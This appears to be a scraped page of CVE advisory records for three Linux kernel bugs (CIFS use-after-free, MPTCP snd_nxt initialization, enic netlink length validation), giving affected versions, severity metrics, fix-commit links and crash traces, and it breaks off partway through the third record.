Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 336a066990bb3962c46daf574ace596bda9303ce (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 558817597d5fbd7af31f891b67b0fd20f0d047b7 (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 89929ea46f9cc11ba66d2c64713aa5d5dc723b09 (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 0ab6f842452ce2cae04209d4671ac6289d0aef8a (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < d328c09ee9f15ee5a26431f5aad7c9239fa85e62 (git)
Affected: a67172a013953664b1dad03c648200c70b90506c (git)

Linux

Affected: 3.13
Unaffected: 0 , < 3.13 (semver)
Unaffected: 5.10.237 , ≤ 5.10.* (semver)
Unaffected: 5.15.181 , ≤ 5.15.* (semver)
Unaffected: 6.1.64 , ≤ 6.1.* (semver)
Unaffected: 6.5.13 , ≤ 6.5.* (semver)
Unaffected: 6.6.3 , ≤ 6.6.* (semver)
Unaffected: 6.7 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.7"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.6.3"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "1da177e4c3f4"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.1.64"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.5.13"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2023-52752",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-22T17:22:07.851461Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-416",
                "description": "CWE-416 Use After Free",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-07T19:50:52.035Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T19:28:47.925Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/558817597d5fbd7af31f891b67b0fd20f0d047b7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/89929ea46f9cc11ba66d2c64713aa5d5dc723b09"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0ab6f842452ce2cae04209d4671ac6289d0aef8a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d328c09ee9f15ee5a26431f5aad7c9239fa85e62"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00030.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cifs_debug.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2abdf136784b7edaec7ffe0f4b461b63f9c4c4de",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "336a066990bb3962c46daf574ace596bda9303ce",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "558817597d5fbd7af31f891b67b0fd20f0d047b7",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "89929ea46f9cc11ba66d2c64713aa5d5dc723b09",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "0ab6f842452ce2cae04209d4671ac6289d0aef8a",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "d328c09ee9f15ee5a26431f5aad7c9239fa85e62",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a67172a013953664b1dad03c648200c70b90506c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cifs_debug.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.13"
            },
            {
              "lessThan": "3.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.237",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.181",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.64",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.5.*",
              "status": "unaffected",
              "version": "6.5.13",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.7",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.237",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.181",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.64",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.5.13",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.3",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.12.48",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free bug in cifs_debug_data_proc_show()\n\nSkip SMB sessions that are being teared down\n(e.g. @ses-\u003eses_status == SES_EXITING) in cifs_debug_data_proc_show()\nto avoid use-after-free in @ses.\n\nThis fixes the following GPF when reading from /proc/fs/cifs/DebugData\nwhile mounting and umounting\n\n  [ 816.251274] general protection fault, probably for non-canonical\n  address 0x6b6b6b6b6b6b6d81: 0000 [#1] PREEMPT SMP NOPTI\n  ...\n  [  816.260138] Call Trace:\n  [  816.260329]  \u003cTASK\u003e\n  [  816.260499]  ? die_addr+0x36/0x90\n  [  816.260762]  ? exc_general_protection+0x1b3/0x410\n  [  816.261126]  ? asm_exc_general_protection+0x26/0x30\n  [  816.261502]  ? cifs_debug_tcon+0xbd/0x240 [cifs]\n  [  816.261878]  ? cifs_debug_tcon+0xab/0x240 [cifs]\n  [  816.262249]  cifs_debug_data_proc_show+0x516/0xdb0 [cifs]\n  [  816.262689]  ? seq_read_iter+0x379/0x470\n  [  816.262995]  seq_read_iter+0x118/0x470\n  [  816.263291]  proc_reg_read_iter+0x53/0x90\n  [  816.263596]  ? srso_alias_return_thunk+0x5/0x7f\n  [  816.263945]  vfs_read+0x201/0x350\n  [  816.264211]  ksys_read+0x75/0x100\n  [  816.264472]  do_syscall_64+0x3f/0x90\n  [  816.264750]  entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n  [  816.265135] RIP: 0033:0x7fd5e669d381"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:17:08.336Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2abdf136784b7edaec7ffe0f4b461b63f9c4c4de"
        },
        {
          "url": "https://git.kernel.org/stable/c/336a066990bb3962c46daf574ace596bda9303ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/558817597d5fbd7af31f891b67b0fd20f0d047b7"
        },
        {
          "url": "https://git.kernel.org/stable/c/89929ea46f9cc11ba66d2c64713aa5d5dc723b09"
        },
        {
          "url": "https://git.kernel.org/stable/c/0ab6f842452ce2cae04209d4671ac6289d0aef8a"
        },
        {
          "url": "https://git.kernel.org/stable/c/d328c09ee9f15ee5a26431f5aad7c9239fa85e62"
        }
      ],
      "title": "smb: client: fix use-after-free bug in cifs_debug_data_proc_show()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52752",
    "datePublished": "2024-05-21T15:30:40.901Z",
    "dateReserved": "2024-05-21T15:19:24.234Z",
    "dateUpdated": "2026-01-05T10:17:08.336Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36889 (GCVE-0-2024-36889)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:28 – Updated: 2025-05-04 09:11

Title

mptcp: ensure snd_nxt is properly initialized on connect

Summary

In the Linux kernel, the following vulnerability has been resolved: mptcp: ensure snd_nxt is properly initialized on connect Christoph reported a splat hinting at a corrupted snd_una: WARNING: CPU: 1 PID: 38 at net/mptcp/protocol.c:1005 __mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005 Modules linked in: CPU: 1 PID: 38 Comm: kworker/1:1 Not tainted 6.9.0-rc1-gbbeac67456c9 #59 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014 Workqueue: events mptcp_worker RIP: 0010:__mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005 Code: be 06 01 00 00 bf 06 01 00 00 e8 a8 12 e7 fe e9 00 fe ff ff e8 8e 1a e7 fe 0f b7 ab 3e 02 00 00 e9 d3 fd ff ff e8 7d 1a e7 fe <0f> 0b 4c 8b bb e0 05 00 00 e9 74 fc ff ff e8 6a 1a e7 fe 0f 0b e9 RSP: 0018:ffffc9000013fd48 EFLAGS: 00010293 RAX: 0000000000000000 RBX: ffff8881029bd280 RCX: ffffffff82382fe4 RDX: ffff8881003cbd00 RSI: ffffffff823833c3 RDI: 0000000000000001 RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000000 R11: fefefefefefefeff R12: ffff888138ba8000 R13: 0000000000000106 R14: ffff8881029bd908 R15: ffff888126560000 FS: 0000000000000000(0000) GS:ffff88813bd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f604a5dae38 CR3: 0000000101dac002 CR4: 0000000000170ef0 Call Trace: <TASK> __mptcp_clean_una_wakeup net/mptcp/protocol.c:1055 [inline] mptcp_clean_una_wakeup net/mptcp/protocol.c:1062 [inline] __mptcp_retrans+0x7f/0x7e0 net/mptcp/protocol.c:2615 mptcp_worker+0x434/0x740 net/mptcp/protocol.c:2767 process_one_work+0x1e0/0x560 kernel/workqueue.c:3254 process_scheduled_works kernel/workqueue.c:3335 [inline] worker_thread+0x3c7/0x640 kernel/workqueue.c:3416 kthread+0x121/0x170 kernel/kthread.c:388 ret_from_fork+0x44/0x50 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:243 </TASK> When fallback to TCP happens early on a client socket, snd_nxt is not yet initialized and any incoming ack will copy such value into snd_una. If the mptcp worker (dumbly) tries mptcp-level re-injection after such ack, that would unconditionally trigger a send buffer cleanup using 'bad' snd_una values. We could easily disable re-injection for fallback sockets, but such dumb behavior already helped catching a few subtle issues and a very low to zero impact in practice. Instead address the issue always initializing snd_nxt (and write_seq, for consistency) at connect time.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/99951b62bf20cec92…
	https://git.kernel.org/stable/c/dc941fec0719d0471…
	https://git.kernel.org/stable/c/39ca83ed73db9edcc…
	https://git.kernel.org/stable/c/aa0c07c1f20e05b30…
	https://git.kernel.org/stable/c/592f69b41766d366d…
	https://git.kernel.org/stable/c/fb7a0d334894206ae…

Impacted products

Vendor

Product

Version

Linux

Affected: 8fd738049ac3d67a937d36577763b47180aae1ad , < 99951b62bf20cec9247f633a3bea898338b9e5b4 (git)
Affected: 8fd738049ac3d67a937d36577763b47180aae1ad , < dc941fec0719d0471a5902424d6b2a17df233193 (git)
Affected: 8fd738049ac3d67a937d36577763b47180aae1ad , < 39ca83ed73db9edcc6d70c0dc7a73085a4725012 (git)
Affected: 8fd738049ac3d67a937d36577763b47180aae1ad , < aa0c07c1f20e05b30019bff083ec43665536f06f (git)
Affected: 8fd738049ac3d67a937d36577763b47180aae1ad , < 592f69b41766d366dbb8ff4ef5a67c4396527bbe (git)
Affected: 8fd738049ac3d67a937d36577763b47180aae1ad , < fb7a0d334894206ae35f023a82cad5a290fd7386 (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 5.10.218 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36889",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:29:56.745706Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:33:02.390Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:49.113Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/99951b62bf20cec9247f633a3bea898338b9e5b4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dc941fec0719d0471a5902424d6b2a17df233193"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39ca83ed73db9edcc6d70c0dc7a73085a4725012"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aa0c07c1f20e05b30019bff083ec43665536f06f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/592f69b41766d366dbb8ff4ef5a67c4396527bbe"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb7a0d334894206ae35f023a82cad5a290fd7386"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/mptcp/protocol.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "99951b62bf20cec9247f633a3bea898338b9e5b4",
              "status": "affected",
              "version": "8fd738049ac3d67a937d36577763b47180aae1ad",
              "versionType": "git"
            },
            {
              "lessThan": "dc941fec0719d0471a5902424d6b2a17df233193",
              "status": "affected",
              "version": "8fd738049ac3d67a937d36577763b47180aae1ad",
              "versionType": "git"
            },
            {
              "lessThan": "39ca83ed73db9edcc6d70c0dc7a73085a4725012",
              "status": "affected",
              "version": "8fd738049ac3d67a937d36577763b47180aae1ad",
              "versionType": "git"
            },
            {
              "lessThan": "aa0c07c1f20e05b30019bff083ec43665536f06f",
              "status": "affected",
              "version": "8fd738049ac3d67a937d36577763b47180aae1ad",
              "versionType": "git"
            },
            {
              "lessThan": "592f69b41766d366dbb8ff4ef5a67c4396527bbe",
              "status": "affected",
              "version": "8fd738049ac3d67a937d36577763b47180aae1ad",
              "versionType": "git"
            },
            {
              "lessThan": "fb7a0d334894206ae35f023a82cad5a290fd7386",
              "status": "affected",
              "version": "8fd738049ac3d67a937d36577763b47180aae1ad",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/mptcp/protocol.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.218",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.218",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: ensure snd_nxt is properly initialized on connect\n\nChristoph reported a splat hinting at a corrupted snd_una:\n\n  WARNING: CPU: 1 PID: 38 at net/mptcp/protocol.c:1005 __mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005\n  Modules linked in:\n  CPU: 1 PID: 38 Comm: kworker/1:1 Not tainted 6.9.0-rc1-gbbeac67456c9 #59\n  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014\n  Workqueue: events mptcp_worker\n  RIP: 0010:__mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005\n  Code: be 06 01 00 00 bf 06 01 00 00 e8 a8 12 e7 fe e9 00 fe ff ff e8\n  \t8e 1a e7 fe 0f b7 ab 3e 02 00 00 e9 d3 fd ff ff e8 7d 1a e7 fe\n  \t\u003c0f\u003e 0b 4c 8b bb e0 05 00 00 e9 74 fc ff ff e8 6a 1a e7 fe 0f 0b e9\n  RSP: 0018:ffffc9000013fd48 EFLAGS: 00010293\n  RAX: 0000000000000000 RBX: ffff8881029bd280 RCX: ffffffff82382fe4\n  RDX: ffff8881003cbd00 RSI: ffffffff823833c3 RDI: 0000000000000001\n  RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000\n  R10: 0000000000000000 R11: fefefefefefefeff R12: ffff888138ba8000\n  R13: 0000000000000106 R14: ffff8881029bd908 R15: ffff888126560000\n  FS:  0000000000000000(0000) GS:ffff88813bd00000(0000) knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: 00007f604a5dae38 CR3: 0000000101dac002 CR4: 0000000000170ef0\n  Call Trace:\n   \u003cTASK\u003e\n   __mptcp_clean_una_wakeup net/mptcp/protocol.c:1055 [inline]\n   mptcp_clean_una_wakeup net/mptcp/protocol.c:1062 [inline]\n   __mptcp_retrans+0x7f/0x7e0 net/mptcp/protocol.c:2615\n   mptcp_worker+0x434/0x740 net/mptcp/protocol.c:2767\n   process_one_work+0x1e0/0x560 kernel/workqueue.c:3254\n   process_scheduled_works kernel/workqueue.c:3335 [inline]\n   worker_thread+0x3c7/0x640 kernel/workqueue.c:3416\n   kthread+0x121/0x170 kernel/kthread.c:388\n   ret_from_fork+0x44/0x50 arch/x86/kernel/process.c:147\n   ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:243\n   \u003c/TASK\u003e\n\nWhen fallback to TCP happens early on a client socket, snd_nxt\nis not yet initialized and any incoming ack will copy such value\ninto snd_una. If the mptcp worker (dumbly) tries mptcp-level\nre-injection after such ack, that would unconditionally trigger a send\nbuffer cleanup using \u0027bad\u0027 snd_una values.\n\nWe could easily disable re-injection for fallback sockets, but such\ndumb behavior already helped catching a few subtle issues and a very\nlow to zero impact in practice.\n\nInstead address the issue always initializing snd_nxt (and write_seq,\nfor consistency) at connect time."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:11:28.710Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/99951b62bf20cec9247f633a3bea898338b9e5b4"
        },
        {
          "url": "https://git.kernel.org/stable/c/dc941fec0719d0471a5902424d6b2a17df233193"
        },
        {
          "url": "https://git.kernel.org/stable/c/39ca83ed73db9edcc6d70c0dc7a73085a4725012"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa0c07c1f20e05b30019bff083ec43665536f06f"
        },
        {
          "url": "https://git.kernel.org/stable/c/592f69b41766d366dbb8ff4ef5a67c4396527bbe"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb7a0d334894206ae35f023a82cad5a290fd7386"
        }
      ],
      "title": "mptcp: ensure snd_nxt is properly initialized on connect",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36889",
    "datePublished": "2024-05-30T15:28:56.794Z",
    "dateReserved": "2024-05-30T15:25:07.065Z",
    "dateUpdated": "2025-05-04T09:11:28.710Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38659 (GCVE-0-2024-38659)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:28 – Updated: 2025-11-04 17:21

Title

enic: Validate length of nl attributes in enic_set_vf_port

Summary

In the Linux kernel, the following vulnerability has been resolved: enic: Validate length of nl attributes in enic_set_vf_port enic_set_vf_port assumes that the nl attribute IFLA_PORT_PROFILE is of length PORT_PROFILE_MAX and that the nl attributes IFLA_PORT_INSTANCE_UUID, IFLA_PORT_HOST_UUID are of length PORT_UUID_MAX. These attributes are validated (in the function do_setlink in rtnetlink.c) using the nla_policy ifla_port_policy. The policy defines IFLA_PORT_PROFILE as NLA_STRING, IFLA_PORT_INSTANCE_UUID as NLA_BINARY and IFLA_PORT_HOST_UUID as NLA_STRING. That means that the length validation using the policy is for the max size of the attributes and not on exact size so the length of these attributes might be less than the sizes that enic_set_vf_port expects. This might cause an out of bands read access in the memcpys of the data of these attributes in enic_set_vf_port.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2b649d7e0cb42a660…
	https://git.kernel.org/stable/c/ca63fb7af9d3e531a…
	https://git.kernel.org/stable/c/3c0d36972edbe56fc…
	https://git.kernel.org/stable/c/25571a12fbc8a1283…
	https://git.kernel.org/stable/c/7077c22f84f41974a…
	https://git.kernel.org/stable/c/f6638e955ca00c489…
	https://git.kernel.org/stable/c/aee1955a1509a921c…
	https://git.kernel.org/stable/c/e8021b94b0412c37b…

Impacted products

Vendor

Product

Version

Linux

Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < 2b649d7e0cb42a660f0260ef25fd55fdc9c6c600 (git)
Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < ca63fb7af9d3e531aa25f7ae187bfc6c7166ec2d (git)
Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < 3c0d36972edbe56fcf98899622d9b90ac9965227 (git)
Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < 25571a12fbc8a1283bd8380d461267956fd426f7 (git)
Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < 7077c22f84f41974a711604a42fd0e0684232ee5 (git)
Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < f6638e955ca00c489894789492776842e102af9c (git)
Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < aee1955a1509a921c05c70dad5d6fc8563dfcb31 (git)
Affected: f8bd909183acffad68780b10c1cdf36161cfd5d1 , < e8021b94b0412c37bcc79027c2e382086b6ce449 (git)

Linux

Affected: 2.6.35
Unaffected: 0 , < 2.6.35 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38659",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
